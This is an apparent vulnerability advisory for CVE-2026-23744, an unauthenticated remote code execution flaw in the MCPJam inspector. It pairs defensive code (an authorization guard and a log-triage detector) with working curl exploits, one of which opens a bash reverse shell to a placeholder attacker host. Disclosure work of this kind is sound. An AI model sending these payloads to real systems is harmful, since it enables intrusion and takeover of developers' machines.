
RCE on MCPJam <= v1.4.2 (CVE-2026-23744)

Metric | Details
Severity Rating | Critical
CVSS v4 score | 9.2
CVSS v4 vector | CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
Component Affected | @mcpjam/inspector (npm package)
Affected Versions | <= 1.4.2
Patched Version | 1.4.3

Vulnerability description

CVE-2026-23744 is a critical remote code execution (RCE) flaw discovered within the @mcpjam/inspector utility, a local-first development platform for Model Context Protocol (MCP) servers. The flaw is primarily caused by an insecure default configuration combined with missing authorisation controls on a critical functional component (CWE-306). By default, the utility binds its HTTP listening server globally to all network interfaces (0.0.0.0) rather than restricting traffic internally via the loopback address (127.0.0.1):

const server = serve({
    fetch: app.fetch,
    port: SERVER_PORT,
    hostname: "0.0.0.0", // Exposes endpoints globally
});

Because the application endpoints are remotely accessible across the network, an unauthenticated attacker can interface directly with the /api/mcp/connect API route. This endpoint is designed to mount and connect to external MCP servers. When a request hits this route, the back-end parses incoming JSON structures to extract execution fields—specifically the command and args vectors inside the serverConfig block—and executes them directly via system subprocess handlers without performing any security checks, input filtering, or authorisation validation.
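The controls missing from that route, sketched as an added example (this is not MCPJam's code and not the fix shipped in 1.4.3). The names BIND_HOST, ALLOWED_COMMANDS, tokenMatches and authorizeConnect, the bearer-token scheme and the launcher allowlist are all assumptions made for illustration:

```javascript
// Added example: hypothetical guard for a connect-style route. Not MCPJam code.
const BIND_HOST = "127.0.0.1"; // loopback only, instead of "0.0.0.0"
const LOOPBACK = new Set(["127.0.0.1", "::1", "::ffff:127.0.0.1"]);
// Assumed allowlist of launchers a developer actually uses for MCP servers.
const ALLOWED_COMMANDS = new Set(["node", "npx", "python", "uvx"]);

// Length-checked, constant-time string comparison for the session token.
function tokenMatches(presented, expected) {
  if (!expected || typeof presented !== "string") return false;
  if (presented.length !== expected.length) return false;
  let diff = 0;
  for (let i = 0; i < expected.length; i++) {
    diff |= presented.charCodeAt(i) ^ expected.charCodeAt(i);
  }
  return diff === 0;
}

// Returns { ok, status, reason }. Only an ok result may reach the spawn call.
function authorizeConnect({ remoteAddress, authorization, body }, sessionToken) {
  if (!LOOPBACK.has(remoteAddress)) {
    return { ok: false, status: 403, reason: "non-loopback client" };
  }
  // A loopback bind alone does not stop requests that a local browser is
  // tricked into sending, so a per-session token is still required.
  const presented = (authorization || "").replace(/^Bearer /, "");
  if (!tokenMatches(presented, sessionToken)) {
    return { ok: false, status: 401, reason: "missing or invalid token" };
  }
  const cfg = body && body.serverConfig;
  if (!cfg || typeof cfg.command !== "string" || !Array.isArray(cfg.args)) {
    return { ok: false, status: 400, reason: "malformed serverConfig" };
  }
  // Defence in depth only: an allowed launcher can still run arbitrary code,
  // so the authentication check above is the control that matters.
  if (!ALLOWED_COMMANDS.has(cfg.command)) {
    return { ok: false, status: 400, reason: "command not allowlisted" };
  }
  if (!cfg.args.every((a) => typeof a === "string")) {
    return { ok: false, status: 400, reason: "non-string argument" };
  }
  return { ok: true, status: 200, reason: "authorized" };
}
```

The server would listen on BIND_HOST and call authorizeConnect before any subprocess is created, returning the status to the client when ok is false.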

Exploitation - Windows deployment

On a Windows asset hosting the vulnerable platform, an attacker can exploit the missing access constraint to execute arbitrary terminal payloads. By passing standard administrative interpreters like cmd.exe or powershell.exe into the unvalidated command variable, paired with an instruction execution flag (such as /c), an external user can force the underlying operating system to run unauthorised tasks under the context of the running node application process.

Proof-of-Concept

An RCE attack can be initiated by transmitting a structured HTTP POST request directly to the target network socket (port 6274 by default):

curl http://<TARGET_WINDOWS_IP>:6274/api/mcp/connect \
  --header "Content-Type: application/json" \
  --data "{\"serverConfig\":{\"command\":\"cmd.exe\",\"args\":[\"/c\", \"calc\"],\"env\":{}},\"serverId\":\"mytest\"}"

Attack Vector Breakdown

  1. API Delivery: The request interfaces over the network with the vulnerable connection handler path (/api/mcp/connect).
  2. Interpreter Target: The payload maps cmd.exe to the command variable, instructing the Windows platform to run the Command Prompt utility.
  3. Argument Hijacking: The args list provides the execution payload instructions (/c to execute and terminate, followed by the target executable command, such as calc).
  4. Subprocess Trigger: The inspector processes the input block directly. Because it lacks parameter isolation, the environment executes cmd.exe /c calc, immediately triggering the command payload on the remote system with zero user interaction.

Exploitation - Linux deployment

While public exploit code and disclosures traditionally focus on Windows environments (using cmd.exe /c), testing indicates that the underlying execution block runs commands natively on Linux as well, including the default Linux shells.

On a Linux runtime environment, an attacker can exploit the missing verification boundary by structuring a payload to invoke /bin/bash along with a standard file-descriptor redirection sequence (>& /dev/tcp/), achieving an interactive reverse shell callback over the network.

Proof-of-Concept

An RCE attack can be initiated by transmitting a structured HTTP POST request directly to the target network socket containing the Linux execution payload:

curl http://<TARGET_LINUX_IP>:6274/api/mcp/connect \
  --header "Content-Type: application/json" \
  --data "{\"serverConfig\":{\"command\":\"/bin/bash\",\"args\":[\"-c\", \"bash -i >& /dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT> 0>&1\"],\"env\":{}},\"serverId\":\"mytest\"}"

Attack Vector Breakdown

  1. API Delivery: The request interfaces over the network with the vulnerable connection handler path (/api/mcp/connect).
  2. Interpreter Target: The payload maps /bin/bash to the command variable, instructing the Linux platform to spawn a bash environment.
  3. Argument Hijacking: The args list provides the execution flag -c followed by a classic TCP backpipe string (bash -i >& /dev/tcp/... 0>&1).
  4. Execution Delivery: The backend processes the object inputs immediately without validation, executing the backpipe command under the privilege context of the service account running the node application process, establishing an outbound interactive terminal session.
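For defenders, the request shapes in both breakdowns above can be hunted in captured traffic. The following is an added example, not part of the original advisory or the MCPJam project: the JSON-lines record format (src, method, path, body), the function name triageConnectRequests and every sample line are constructed assumptions, standing in for whatever a reverse proxy or packet capture in front of port 6274 produces.

```javascript
// Added example: triage of request logs for CVE-2026-23744 style requests.
// Log format and sample records are constructed for illustration.
const SAMPLE_LOG = [
  '{"src":"127.0.0.1","method":"POST","path":"/api/mcp/connect","body":{"serverConfig":{"command":"npx","args":["-y","example-mcp-server"],"env":{}},"serverId":"dev"}}',
  '{"src":"192.0.2.44","method":"POST","path":"/api/mcp/connect","body":{"serverConfig":{"command":"cmd.exe","args":["/c","calc"],"env":{}},"serverId":"mytest"}}',
  '{"src":"192.0.2.45","method":"POST","path":"/api/mcp/connect","body":{"serverConfig":{"command":"/bin/bash","args":["-c","bash -i >& /dev/tcp/198.51.100.7/4444 0>&1"],"env":{}},"serverId":"mytest"}}',
  '{"src":"192.0.2.46","method":"GET","path":"/","body":null}',
  'not json',
];

const LOOPBACK_SRC = new Set(["127.0.0.1", "::1"]);
const INTERPRETERS = new Set(["cmd.exe", "powershell.exe", "bash", "sh"]);

// Returns one finding per suspicious POST to the connect route.
function triageConnectRequests(lines) {
  const findings = [];
  for (const line of lines) {
    let rec;
    try { rec = JSON.parse(line); } catch { continue; } // skip unparsable lines
    if (!rec || rec.method !== "POST" || rec.path !== "/api/mcp/connect") continue;
    const cfg = (rec.body && rec.body.serverConfig) || {};
    // Compare on the basename so "/bin/bash" and "C:\\Windows\\cmd.exe" both match.
    const base = String(cfg.command || "").split(/[\\\/]/).pop().toLowerCase();
    const args = Array.isArray(cfg.args) ? cfg.args.join(" ") : "";
    const reasons = [];
    if (!LOOPBACK_SRC.has(rec.src)) reasons.push("remote source");
    if (INTERPRETERS.has(base)) reasons.push("shell interpreter as command");
    if (args.includes("/dev/tcp/")) reasons.push("/dev/tcp redirection in args");
    if (reasons.length > 0) {
      findings.push({ src: rec.src, command: cfg.command, reasons });
    }
  }
  return findings;
}
```

Any request to this route from a non-loopback source is worth reviewing on an affected version, whatever the command; the interpreter and /dev/tcp checks only help prioritise.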

Remediation Recommendations

To eliminate CVE-2026-23744 and protect deployment environments against remote command execution, developers and platform administrators must apply the following remediation steps immediately.

The vendor has addressed this vulnerability by implementing safety validation and input parameterization in commit e6b9cf9. Production systems must upgrade the @mcpjam/inspector package to version 1.4.3 or later (the patched release at the time of this post) to replace the vulnerable command handling code:

npm install @mcpjam/inspector@latest


References

The analysis detailed in this post was compiled by referencing the official security advisories and documentation detailed below.
